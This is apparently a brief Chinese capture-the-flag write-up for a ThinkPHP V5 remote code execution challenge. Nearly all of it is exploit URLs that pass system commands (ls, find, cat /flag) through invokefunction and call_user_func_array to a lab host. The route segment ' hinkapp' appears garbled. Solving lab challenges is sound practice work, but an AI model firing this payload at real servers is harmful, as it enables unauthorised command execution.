0x01 PHP_RCE
RCE(remote command/code execute):远程命令/代码执行
此题为ThinkPHP V5远程代码执行漏洞
0x02 命令执行
http://124.126.19.106:55365/?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[命令]
http://124.126.19.106:55365/?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
http://124.126.19.106:55365/?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name=flag
http://124.126.19.106:55365/?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag